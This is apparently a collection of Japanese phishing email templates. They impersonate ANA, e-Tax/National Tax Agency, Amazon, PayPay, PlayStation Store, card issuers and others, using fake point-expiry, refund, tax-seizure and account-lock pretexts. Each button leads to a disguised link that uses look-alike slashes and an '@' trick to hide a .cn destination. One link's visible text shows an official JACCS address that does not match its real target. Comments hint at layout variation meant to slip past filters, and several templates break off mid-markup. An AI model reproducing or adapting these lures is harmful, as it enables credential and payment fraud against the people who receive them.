R-1 R-2 R-3 R-4 R-5

__マイル加算の手続きについてANAマイレージクラブからのお知らせ。

<!-- メモ: ANAマイル有効期限 通知テンプレート 新構造 --><HTML
lang=ja><HEAD><TITLE>ANAマイルのご案内</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
html { font-size: 15px; }
body {
background: #f4f6f9;
font-family: "Meiryo", "Hiragino Kaku Gothic ProN", sans-serif;
margin: 0;
padding: 0;
color: #222;
}
header.banner {
background: #004ea2;
color: #fff;
padding: 1.4rem 1.6rem;
font-size: 1.1rem;
font-weight: bold;
text-align: center;
}
main.container {
max-width: 720px;
margin: 1.5rem auto;
background: #fff;
border-radius: 8px;
box-shadow: 0 0 8px rgba(0,0,0,0.06);
overflow: hidden;
}
section.info {
padding: 1.6rem 2rem;
line-height: 1.7;
font-size: 0.95rem;
}
.highlight {
background: #eaf4fe;
border-left: 4px solid #005bac;
padding: 1rem;
margin: 1.2rem 0;
font-weight: bold;
color: #003366;
border-radius: 3px;
}
.cta-section {
text-align: center;
margin: 2rem 0;
}
.cta-section a {
display: inline-block;
background: #0074c2;
color: #fff;
font-weight: bold;
padding: 0.9rem 2.4rem;
border-radius: 4px;
text-decoration: none;
border: 1px solid #0060a8;
}
.cta-section a:hover {
background: #005bac;
}
footer.notes {
font-size: 0.85rem;
color: #555;
border-top: 1px solid #ddd;
padding: 1.5rem 2rem;
}
footer.notes ul {
padding-left: 1.2rem;
margin: 0.5rem 0 0;
}
.footer-end {
background: #f2f2f2;
text-align: center;
font-size: 0.75rem;
color: #888;
padding: 1rem;
border-top: 1px solid #e0e0e0;
}
@media screen and (max-width: 600px) {
main.container { margin: 1rem 0.8rem; }
section.info, footer.notes { padding: 1.2rem 1rem; }
.cta-section a { width: 90%; padding: 1rem 0; }
}
</STYLE>

</HEAD>
<BODY><HEADER class=banner>ANAマイレージバンク - マイル失効のご案内</HEADER> <MAIN
class=container><SECTION class=info>
<P>平素よりANAマイレージバンクをご利用いただきありがとうございます。</P>
<P>2026-01-05までに有効期限を迎えるマイルがございます。</P>
<DIV class=highlight>有効期限切れ予定マイル:<STRONG>5,631マイル</STRONG></DIV>
<P>マイルは航空券、ショッピング、ギフト券など多彩な用途にご利用いただけます。</P>
<P>以下のリンクから詳細を確認し、期限内にぜひご活用ください。</P></SECTION>
<DIV class=cta-section><A
href="https://qaijshru.com∕BrBRf∕FmCIaA∕TnQWSR@dhnsp.cn/sfvgns.co.jp">マイルを利用する</A>
</DIV><SECTION class=info>
<P style="padding-left:0;">ご確認がない場合、マイルが失効となる可能性がございますのでご注意ください。</P></SECTION><FOOTER
class=notes><STRONG>【マイルのご利用例】</STRONG>
<UL>
<LI>特典航空券への交換
<LI>ANAショッピング A-style での利用
<LI>提携ポイントやギフト券への交換 </LI></UL><BR><STRONG>【ご注意事項】</STRONG>
<UL>
<LI>有効期限を過ぎたマイルは失効いたします。
<LI>記載内容は2025年10月時点の情報です。 </LI></UL></FOOTER>
<DIV class=footer-end>© 2025 All Nippon Airways Co., Ltd. All Rights
Reserved.</DIV></MAIN></BODY></HTML>

__ジャンボ宝くじ22枚無料進呈、キャンペーン実施中です

<!-- NOTE: Loto-style v1 新構造テンプレート --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f4f4f4;
font-family: "Meiryo", sans-serif;
color: #222;
}
.wrap {
max-width: 680px;
margin: auto;
background: #fff;
border-radius: 8px;
overflow: hidden;
box-shadow: 0 0 6px rgba(0,0,0,0.08);
}
.head {
background: #9e0038;
color: #fff;
text-align: center;
padding: 20px;
font-size: 18px;
font-weight: bold;
}
.content {
padding: 24px;
}
.content h1 {
font-size: 17px;
color: #9e0038;
margin: 0 0 14px;
}
.content p {
font-size: 15px;
margin: 10px 0;
line-height: 1.7;
}
.box {
background: #fff8f8;
border-left: 4px solid #9e0038;
padding: 16px;
margin: 18px 0;
}
.cta {
display: flex;
justify-content: center;
padding: 30px 0;
}
.cta a {
display: block;
text-align: center;
border: 2px solid #9e0038;
color: #9e0038;
font-weight: bold;
text-decoration: none;
padding: 14px 24px;
border-radius: 28px;
font-size: 16px;
width: 90%;
max-width: 320px;
transition: 0.3s;
}
.cta a:hover {
background: #9e0038;
color: #fff;
}
.foot {
background: #efefef;
font-size: 12px;
text-align: center;
color: #666;
padding: 16px;
border-top: 1px solid #ccc;
}
@media (max-width: 600px) {
.content {
padding: 18px;
}
.cta a {
font-size: 17px;
padding: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=head>【宝くじ公式サイト】特別キャンペーンのお知らせ</DIV>
<DIV class=content>
<H1>日頃のご愛顧に感謝を込めて</H1>
<P style="display:inline;">いつも宝くじ公式サイトをご利用いただき、誠にありがとうございます。</P>
<P>ただいま<EM>特別キャンペーン</EM>を期間限定で開催中です。</P>
<DIV class=box>
<P><STRONG>■ プレゼント内容:</STRONG><BR>ハロウィンジャンボ宝くじ
22枚(連番11枚+バラ11枚)<BR><STRONG>価格:</STRONG>6,600円相当</P>
<P style="font-variant-caps:normal;"><STRONG>■ 対象者:</STRONG> 宝くじ公式サイト会員</P>
<P><STRONG>■ 応募期限:</STRONG> このメール受信から <STRONG>3日以内</STRONG></P></DIV>
<P style="user-select:auto;">キャンペーンの詳細は以下よりご確認ください。</P></DIV>
<DIV class=cta><A
href="https://kbxclf.com∕WlmHpxT∕WJgNyNQvWX∕hwQNbm∕LirnZixLJ∕GKYxof@AeZyxwkK.ztbashm.cn">キャンペーンに申し込む</A>
</DIV>
<DIV class=foot>本メールは送信専用です。お問い合わせは公式サイトよりお願いいたします。<BR>© 2025 宝くじ公式サイト All
rights reserved. </DIV></DIV></BODY></HTML>

JACCSポイント残高のご案内No.477080179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML svg="http://www.w3.org/2000/svg" 2000 www.w3.org http:
XMLNS:[default]><HEAD>
<META content="text/html; charset=utf-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P>お客様</P>
<P>平素よりJACCSカードをご利用いただき、誠にありがとうございます。</P>
<P>本メールは、現在のJACCSポイントのご利用状況についてのご案内です。</P>
<P>■ 失効予定ポイント数<BR data-end="292" data-start="289"><FONT
color=red>9,850ポイント</FONT></P>
<P data-end="328" data-start="305">■ 失効予定日<BR data-end="315"
data-start="312"><FONT color=red>2025年12月17日</FONT></P>
<P>────────────────────<BR>■ ポイントに関する情報のご確認<BR>────────────────────</P>
<P>ポイントの交換内容やご利用方法につきましては、<BR>JACCS公式サイトにてご案内しております。</P>
<P>JACCS公式サイト<BR><A href="https://winyourrenovation.com/DPMSRxdhXX"><FONT
size=4>https://www.jaccs.co.jp/help/index.jsp</FONT></A></P>
<P>────────────────────<BR>■ JACCSポイントのご利用内容について<BR>────────────────────</P>
<P>お持ちのJACCSポイントは、以下のような内容にご利用いただけます。</P>
<P>・日用品や生活雑貨などの商品<BR>・食品・グルメ関連の商品<BR>・各種ギフト券・商品券<BR>・デジタル形式の特典やサービス<BR>・提携サービスのポイントへの移行<BR>・カードご利用代金への充当</P>
<P>※交換対象や必要ポイント数は内容により異なります。</P>
<P>────────────────────<BR>■ ご案内<BR>────────────────────</P>
<P>年末が近づく時期となり、<BR>ポイントをご確認・ご利用される方が増えております。</P>
<P>ご都合のよいタイミングで、<BR>ポイントのご利用をご検討いただくことをおすすめいたします。</P>
<P>────────────────────<BR>本メールは、JACCSカードのサービス内容に関するご案内です。<BR>詳細につきましては、公式サイトをご確認ください。</P>
<P>今後ともJACCSカードをよろしくお願いいたします。</P>
<P>────────────────────<BR>株式会社ジャックス<BR>JACCSカード<BR>※本メールは送信専用です。</P></BODY></HTML>

【対応のお願い】税金が未納の状態です

<!-- NOTE: e-Tax Ultra v2 | New DOM Hash | Unused Layout --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f2f5f9;
font-family: "Hiragino Kaku Gothic ProN", Meiryo, sans-serif;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 700px;
margin: 0 auto;
background: #fff;
border: 1px solid #dcdcdc;
border-radius: 10px;
overflow: hidden;
}
.bar-top {
background: #003366;
color: #fff;
padding: 22px 20px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.section {
padding: 26px 30px;
}
.section p {
margin: 12px 0;
}
.notice {
background: #fff5f5;
border-left: 5px solid #b71c1c;
padding: 18px;
margin: 20px 0;
border-radius: 4px;
}
.info-list {
background: #f0f4f8;
padding: 20px;
border: 1px solid #ccd3db;
border-radius: 5px;
}
.info-list ul {
margin: 0;
padding-left: 20px;
}
.info-list li {
margin-bottom: 8px;
}
.jump {
display: flex;
justify-content: center;
margin: 30px 0;
}
.jump a {
display: inline-block;
padding: 12px 34px;
border: 2px solid #003366;
color: #003366;
text-decoration: none;
font-weight: bold;
border-radius: 32px;
transition: 0.3s;
}
.jump a:hover {
background: #003366;
color: #fff;
}
.support {
font-size: 13px;
color: #444;
padding-top: 10px;
}
.footer {
font-size: 12px;
color: #666;
background: #f9f9f9;
padding: 22px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.section {
padding: 20px;
}
.jump a {
width: 90%;
box-sizing: border-box;
font-size: 16px;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=frame>
<DIV class=bar-top>【e-Tax】税金未納に関する重要なお知らせ</DIV>
<DIV class=section>
<P style="border-radius:0;">e-Taxをご利用いただき、誠にありがとうございます。</P>
<P>下記の日付に関して、所得税または延滞金(法律に基づき算出されたもの)のお支払いが確認できておりません。</P>
<P style="z-index:auto;">これまで自主的な納付をお願いしてまいりましたが、現時点で未納の状態が継続しております。</P>
<DIV
class=notice>このまま最終期限までに納付がない場合、<BR>不動産・自動車等の登録財産や給与・売掛金等の債権に対する差押処分が実施される可能性がございます。
</DIV>
<DIV class=info-list>
<UL>
<LI><STRONG>納付期限:</STRONG>2025年11月20日
<LI><STRONG>最終期限:</STRONG>2025年12月30日(※延長不可) </LI></UL></DIV>
<DIV class=jump><A
href="https://snxzou.com∕LfBIhNVGJA∕pqurjSKe∕jkjCe∕xRmjTuX∕YdFJjhZi@ktHjohNjzG.gzusxo.cn">お支払いへ進む</A>
</DIV>
<DIV class=support>※
本メールは、【e-Tax】国税電子申告・納税システムにご登録いただいた方へ配信しております。<BR>このメールアドレスは送信専用のため、ご返信には対応しておりません。
</DIV></DIV>
<DIV class=footer>ご不明な点がございましたら、以下までお問い合わせください。<BR><BR>カスタマーサポート:<BR>メールアドレス:<A
href="mailto:info@ntago.jp">info@ntago.jp</A><BR>電話番号:03-6680-3000<BR><BR>国税庁<BR>〒100-8978
東京都千代田区霞が関3-1-1<BR>法人番号:7000012050002<BR><BR>Copyright © TAX AGENCY All Rights
Reserved.<BR>このメールは自動生成されたものです。ご返信には対応しておりません。 </DIV></DIV></BODY></HTML>

__【DMMオンラインサロン】登録するだけで10,000ポイント!

<!-- UltraClean DMM Points v1 | 公式キャンペーン構造完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f5f5f5;
font-family: "Meiryo", "Hiragino Kaku Gothic ProN", sans-serif;
font-size: 15px;
color: #2a2a2a;
line-height: 1.7;
}
.wrap {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 12px;
box-shadow: 0 2px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.banner {
background: #fff;
padding: 22px;
border-bottom: 2px solid #a00024;
text-align: center;
color: #a00024;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 28px 30px;
}
.section p {
margin: 16px 0;
}
.notice {
background: #fff0f0;
border-left: 4px solid #b50024;
padding: 16px 18px;
font-size: 14px;
border-radius: 6px;
margin: 20px 0;
}
.cta-box {
text-align: center;
margin: 30px 0;
}
.cta-box a {
display: inline-block;
padding: 14px 34px;
background: #b50024;
color: #fff;
border-radius: 40px;
text-decoration: none;
font-weight: bold;
font-size: 15px;
box-shadow: 0 3px 6px rgba(0,0,0,0.1);
transition: all 0.3s ease;
}
.cta-box a:hover {
background: #c8002f;
}
.footer-text {
font-size: 13px;
color: #444;
margin-top: 24px;
}
.bottom {
background: #f3f3f3;
font-size: 12px;
color: #777;
text-align: center;
padding: 20px 18px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 640px) {
.section {
padding: 20px 16px;
font-size: 14px;
}
.cta-box a {
width: 100%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=banner>【DMMオンラインサロン】10,000ポイントプレゼントキャンペーン</DIV>
<DIV class=section>
<P style="background-clip:border-box;">いつもDMMオンラインサロンをご利用いただき、誠にありがとうございます。</P>
<P>感謝の気持ちを込めて、<STRONG>10,000ポイントプレゼントキャンペーン</STRONG>を開催中です。</P>
<DIV class=notice>対象ページからのお申込みだけで、<BR><STRONG>10,000円相当のDMMポイント</STRONG>をプレゼント!
</DIV>
<P style="visibility:visible;">キャンペーンの詳細および申込方法については、下記よりご確認ください。</P>
<DIV class=cta-box><A
href="https://wpfrcq.com∕aKKsi∕HiUxUk∕jqVTRpDw∕NFJqkXTrpc∕HSLNCZ@sZXfTFTW.mounfk.cn"
target=_blank>

PS Store本人確認に関する新たな取り組みについて

<!-- UltraClean PSStore v1 | 完全異構HTML構造 + 新ボタン + 応答性 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #e8ecf2;
font-family: "Meiryo", sans-serif;
font-size: 15px;
line-height: 1.7;
color: #1d1d1d;
}
.outer {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.06);
overflow: hidden;
}
.top {
background: #25284f;
color: #fff;
padding: 24px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.content {
padding: 28px 30px;
}
.content h2 {
font-size: 16px;
color: #25284f;
border-left: 4px solid #7890ff;
padding-left: 10px;
margin: 0 0 16px;
}
.alert-box {
background: #eef2fd;
border: 1px solid #90b4f7;
padding: 16px;
margin: 20px 0;
border-radius: 4px;
font-size: 14px;
}
.cta-center {
margin: 30px 0;
text-align: center;
}
.cta-link {
background: #ffffff;
border: 2px solid #4a6cf7;
color: #4a6cf7;
padding: 12px 30px;
font-weight: bold;
border-radius: 999px;
text-decoration: none;
font-size: 15px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-link:hover {
background: #f0f4ff;
}
.footer {
font-size: 12px;
color: #777;
background: #f5f5f5;
text-align: center;
padding: 18px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px 16px;
}
.cta-link {
display: block;
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer>
<DIV class=top>PlayStation Store 本人認証に関するご案内</DIV>
<DIV class=content>
<H2>セキュリティ強化のご案内</H2>
<P>平素よりPlayStation Storeをご利用いただき誠にありがとうございます。</P>
<P style="right:auto;">このたび、クレジットカード取引のさらなる安全性を確保するため、本人認証サービス(EMV 3-Dセキュア)を導入いたします。</P>
<DIV
class=alert-box>お支払い時にはワンタイムパスワードの入力が必要となる場合がございます。<BR>ご利用には、各カード会社のWebサイトやアプリでの事前登録が必要です。
</DIV>
<P style="background-size:auto;">未登録の場合、お支払いが正常に完了しない可能性があります。詳細は以下のリンクをご確認ください。</P>
<DIV class=cta-center><A class=cta-link
href="https://dumzap.com∕KoUCL∕OrjxW∕zbOSRjpDa∕PWBgUQinDI∕bBcnbZvDG@PGKereBZnF.caiurer.cn"
target=_blank>詳細を見る</A> </DIV>
<P style="border-bottom-left-radius:1em;">本人認証サービスをご利用いただくことで、より安心してお買い物いただけます。</P></DIV>
<DIV class=footer>本メールは送信専用です。返信には対応しておりません。<BR>© 2025 Sony Interactive
Entertainment Inc. All Rights Reserved. </DIV></DIV></BODY></HTML>

__【Amazon】プライム会員情報が一時的にロックされています

<HTML lang=ja><HEAD><TITLE>Amazonプライム支払い確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f3f4f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-shell { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); border:1px solid #ddd; }
.headbar { background:#232f3e; color:#fff; text-align:center; padding:22px; font-size:16px; font-weight:bold; }
.maincontent { padding:28px 30px; }
.maincontent p { margin-bottom:16px; }
.warnblock { background:#fff0e1; border-left:6px solid #d9822b; padding:14px 20px; font-size:14px; font-weight:bold; border-radius:4px; margin:24px 0; color:#8b4513; }
.cta { text-align:center; margin:30px 0; }
.cta a { display:inline-block; background:#ff8c00; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:5px; transition:all .3s ease; }
.cta a:hover { background:#d26900; }
.infolist { padding:0 0 0 20px; margin:0 0 24px; font-size:14px; color:#333; }
.infolist li { margin-bottom:8px; }
.footerinfo { background:#f5f6f7; padding:20px 26px; font-size:13px; color:#666; border-top:1px solid #ccc; text-align:center; }
.footerinfo a { color:#007bff; text-decoration:none; }
@media screen and (max-width: 600px) {
.maincontent { padding:18px 16px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer-shell>
<DIV class=headbar>Amazonプライム会員資格の更新について</DIV>
<DIV class=maincontent>
<P>いつもAmazonプライムをご利用いただき、誠にありがとうございます。</P>
<P style="all:none;">現在、ご登録の支払い方法により月額料金の請求が正常に処理できておりません。</P>
<P><STRONG>お支払い情報を確認の上、3日以内に再設定をお願いいたします。</STRONG></P>
<DIV class=warnblock>ご対応がない場合、プライム特典の一時停止やアカウント機能の制限が行われる可能性があります。 </DIV>
<P><STRONG>請求保留の主な理由:</STRONG></P>
<UL class=infolist>
<LI>クレジットカードの有効期限切れ
<LI>口座残高不足または引き落とし不能
<LI>カード会社による承認拒否
<LI>登録情報の更新漏れ </LI></UL>
<P>プライム特典を継続してご利用いただくために、早めのご対応をお願いいたします。</P></DIV>
<DIV class=cta><A
href="https://ctkii.com∕qlefqbnbtm∕iyigeyvuob∕mwqiixpzn∕loezabzd∕yimcwmtt@lwmzuss.cn">お支払い方法を確認する</A>
</DIV>
<DIV class=footerinfo>このメールは送信専用です。返信はできません。<BR>詳細は <A href="#">カスタマーサービス</A>
までお問い合わせください。<BR><BR>© 2025 Amazon Japan G.K. All rights reserved.
</DIV></DIV></BODY></HTML>

【重要】Vポイント有効期限が迫っています|お早めにご利用くださいNo.532713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML svg="http://www.w3.org/2000/svg" 2000 www.w3.org http: XMLNS:[default]
XMLNS:[default] http://www.w3.org/2000/svg = "http://www.w3.org/2000/svg"><HEAD>
<META content="text/html; charset=utf-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P data-start="108" data-end="144"><STRONG data-start="108"
data-end="144">【重要】Vポイント有効期限が迫っています|お早めにご利用ください</STRONG></P>
<P data-start="146" data-end="177">いつも三井住友カードをご利用いただきありがとうございます。</P>
<P data-start="179" data-end="253">お客様がお持ちの <STRONG data-start="188"
data-end="216">Vポイントの一部が、まもなく有効期限を迎えます。</STRONG><BR data-start="216"
data-end="219">有効期限を過ぎると、未使用分のポイントは自動的に失効いたします。</P>
<P data-start="255" data-end="303">────────────────────<BR data-start="275"
data-end="278">■ 失効予定ポイント数<BR data-start="289" data-end="292"><FONT
color=red>8,810ポイント</FONT></P>
<P data-start="305" data-end="328">■ 失効予定日<BR data-start="312"
data-end="315"><FONT color=red>2025年12月17日</FONT></P>
<P data-start="330" data-end="380">────────────────────<BR data-start="350"
data-end="353">Vポイントは、以下の特典にすぐご利用いただけます。</P>
<P data-start="382" data-end="514">・現金キャッシュバック(口座振込・請求金額からの減額)<BR
data-start="409" data-end="412">・Amazonギフト券・Google Play・App Store &amp; iTunes
ギフトコード<BR data-start="461" data-end="464">・ANAマイル・Tポイント・楽天ポイント など各種提携先ポイント<BR
data-start="496" data-end="499">・各種電子マネーや商品交換</P>
<P data-start="516" data-end="574">

__【重要】ETCご利用料金の返金に関するご案内

<!-- UltraClean ETC Refund v1 | DOM再構成 + Official Layout --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background: #f5f7fa;
color: #222;
font-size: 15px;
line-height: 1.7;
}
.container {
max-width: 700px;
margin: 30px auto;
background: #ffffff;
border-radius: 10px;
box-shadow: 0 1px 6px rgba(0,0,0,0.05);
overflow: hidden;
}
.header {
background: #005bac;
color: #fff;
padding: 20px 24px;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 26px 30px;
}
.section p {
margin: 14px 0;
}
.cta-wrap {
text-align: center;
margin: 30px 0;
}
.cta-button {
background: #e60012;
color: #fff;
font-weight: bold;
font-size: 15px;
text-decoration: none;
padding: 14px 32px;
border-radius: 40px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-button:hover {
background: #ba0010;
}
.footnote {
font-size: 13px;
color: #666;
text-align: center;
padding: 20px;
background: #f1f1f1;
border-top: 1px solid #ccc;
line-height: 1.6;
}
@media screen and (max-width: 600px) {
.section {
padding: 20px 16px;
font-size: 14px;
}
.cta-button {
width: 100%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=container>
<DIV class=header>ETC利用照会サービス|返金のお手続きについて</DIV>
<DIV class=section>
<P>平素よりETCサービスをご利用いただき、誠にありがとうございます。</P>
<P>一部のご利用において、過剰請求が発生していたことが確認されました。</P>
<P style="left:auto;">以下のリンクより返金手続きをお願いいたします。期限内にお手続きがない場合、返金は無効となる可能性がございます。</P>
<P>皆さまにはご不便をおかけし誠に申し訳ございませんが、何卒ご理解のほどよろしくお願い申し上げます。</P>
<DIV class=cta-wrap><A class=cta-button
href="https://aqlsw.com∕gANfKk∕RoGYskJiIX∕MwusgEnEqz@awlsvhv.cn/ilnyueegdo.co.jp"
target=_blank>返金手続きはこちら</A> </DIV>
<P style="font-kerning:auto;">※ 本メールは自動送信されています。ご不明点は公式サイトよりご確認ください。</P></DIV>
<DIV class=footnote>© ETC利用照会サービス運営センター<BR>本メールに心当たりがない場合は破棄してください。
</DIV></DIV></BODY></HTML>

__お見逃しなく!今だけ受け取れる5000円相当のPayPayボーナスと注目キャンペーン

<HTML lang=ja><HEAD><TITLE>【PayPay】5000円分ボーナス受け取りのご案内</TITLE><META charset=UTF-8><META name=viewport content="width=device-width, initial-scale=1.0"><META name=format-detection content=telephone=no><META name=robots content=noindex,nofollow><STYLE> body { margin: 0; padding: 0; background-color: #f4f4f4; font-family: "Yu Gothic", "Meiryo", sans-serif; color: #333; } .wrapper { max-width: 680px; margin: 0 auto; background-color: #ffffff; } .header { background-color: #c60023; padding: 14px 20px; color: #fff; font-weight: bold; font-size: 18px; } .header-title { font-size: 16px; padding: 10px 20px; background-color: #fff0f0; border-bottom: 1px solid #ccc; font-weight: bold; color: #c60023; } ..section { padding: 24px 28px; } .section h2 { font-size: 15px; border-left: 4px solid #c60023; padding-left: 10px; margin: 0 0 16px; color: #c60023; } .section p { font-size: 14px; line-height: 1.7; margin: 12px 0; } .box-info { background: #fff6f6; border: 1px solid #ffc0c0; padding: 16px 18px; font-size: 13px; margin: 20px 0; } .cta-block { padding: 28px 20px; text-align: center; background-color: #fff4f4; border-top: 1px solid #ddd; } .cta-button table { margin: 0 auto; background: linear-gradient(to right, #c60023, #9e001a); border-radius: 60px; } .cta-button td { padding: 14px 36px; } ..cta-button a { font-size: 15px; color: #fff; text-decoration: none; display: inline-block; } .disclaimer { padding: 20px 24px; font-size: 12px; background-color: #f8f8f8; border-top: 1px solid #ccc; color: #666; line-height: 1.6; } .footer { text-align: center; font-size: 12px; color: #999; background: #eeeeee; padding: 16px 10px; border-top: 1px solid #ccc; } @media screen and (max-width: 600px) { .section, .disclaimer { padding: 16px 16px; } .cta-button td { padding: 16px 0; } } </STYLE></HEAD><BODY><DIV class=wrapper><DIV class=header>PayPay株式会社</DIV><DIV class=header-title>【重要】5000円分ボーナス受け取りのご案内</DIV><DIV class=section><H2>キャンペーンの目的</H2><P style="border-top-right-radius:;">日頃よりPayPayをご利用いただき、誠にありがとうございます。</P><P>現在、特定加盟店でのご利用を対象とした期間限定のキャンペーンを実施中です。</P><H2>概要</H2><DIV class=box-info><P style="padding:0;"><STRONG>■ 内容:</STRONG><BR>ウエルシアグループアプリ経由でPayPay決済されたお客様に、<BR><STRONG>税込1,500円以上</STRONG>のご利用で<STRONG>3回に1回の確率</STRONG>で抽選を実施いたします。</P><P><STRONG>■ 期間:</STRONG>2025年10月1日 ~ 2025年10月30日<BR><STRONG>■ 付与上限:</STRONG>100,000ポイント/回・期間</P></DIV><H2>お手続き</H2><P style="background-origin:padding-box;">以下のボタンより、キャンペーンページにアクセスし、詳細をご確認ください。</P></DIV><DIV class=cta-block><DIV class=cta-button><TABLE cellSpacing=0 cellPadding=0> <TBODY> <TR> <TD><A href="https://bffkea.com∕jmricii∕nqjcwq∕uqvoe∕vikqwxiy∕itaiuy@yzkxdlc.cn/jTlPX-N/help/ZfoHp/wishlist/Qk2FYsdFQMco/ZPmnVQW/subscription/0U2gh/feedback/2zK20SOt6ItAY/-UPGA2L/orders?locale=ja-JP&clickid=UlPAO08p4ZKt&product=EWYzPcBF&user_agent=5FqHUMQh6A&device=mobile&session=9ZyfAA-a4l" target=_blank>▶ 詳細はこちら </A></TD></TR></TBODY></TABLE></DIV></DIV><DIV class=disclaimer><P style="margin-left:0;">※当選ポイントは支払日の翌日から30日後に付与されます。</P><P>※PayPay商品券・クレジットカード(PayPayクレジット以外)は対象外です。</P><P>※PayPayアプリ単体からの支払いも対象外です。</P><P style="border-bottom-left-radius:1em;">※ポイントは出金・譲渡不可です。</P><P style="border-spacing:2px;">※本メールは送信専用です。ご返信いただいても確認・回答は致しかねます。</P></DIV><DIV class=footer>───────────────────────────────<BR>Copyright (c) PayPay Corporation. All Rights Reserved.<BR>東京都千代田区紀尾井町1-3 </DIV></DIV></BODY></HTML>

__ポケットカード:制限解除に向けた手続きについて

<!-- UltraClean Pocketcard v1 | 完全異構DOM + ボタン再構築 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background: #eef1f4;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.outer {
max-width: 700px;
margin: 20px auto;
background: #fff;
border: 1px solid #ccc;
border-radius: 10px;
box-shadow: 0 0 6px rgba(0,0,0,0.04);
overflow: hidden;
}
.topbar {
background: #004b91;
color: #fff;
padding: 20px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.info {
background: #f7f9fc;
padding: 12px 24px;
font-size: 13px;
color: #444;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.alert-box {
background: #e6f3ff;
border-left: 5px solid #0077c2;
padding: 16px;
border-radius: 4px;
margin: 24px 0;
font-size: 14px;
}
.cta-box {
text-align: center;
margin: 36px 0;
}
.cta-button {
background: #005bac;
color: #fff;
padding: 14px 32px;
font-weight: bold;
font-size: 15px;
border-radius: 999px;
text-decoration: none;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #0072cc;
}
.note-block {
background: #f5f5f5;
font-size: 13px;
padding: 20px 24px;
text-align: center;
color: #666;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
}
}
</STYLE>

</HEAD>
<BODY>
<DIV class=outer>
<DIV class=topbar>Pocketcard セキュリティセンターからのお知らせ</DIV>
<DIV class=info>通知番号:PC-2025-12-16 / お客様番号:****560</DIV>
<DIV class=content>
<P style="column-rule:medium none black;"><STRONG>アカウントの再認証をお願いいたします。</STRONG></P>
<P style="page-break-after:auto;">いつも Pocketcard をご利用いただきありがとうございます。</P>
<P style="transform:none;">システムによるセキュリティチェックの結果、現在お客様アカウントにて再認証が必要と判定されました。</P>
<DIV class=alert-box><STRONG>▼
再認証の手順</STRONG><BR>・下記のボタンよりログインページにアクセスしてください。<BR>・案内に従って、必要な情報をご入力ください。<BR><BR><STRONG>※</STRONG>
本通知から48時間以内に手続きが行われない場合、一部機能が制限される可能性があります。 </DIV>
<DIV class=cta-box><A class=cta-button
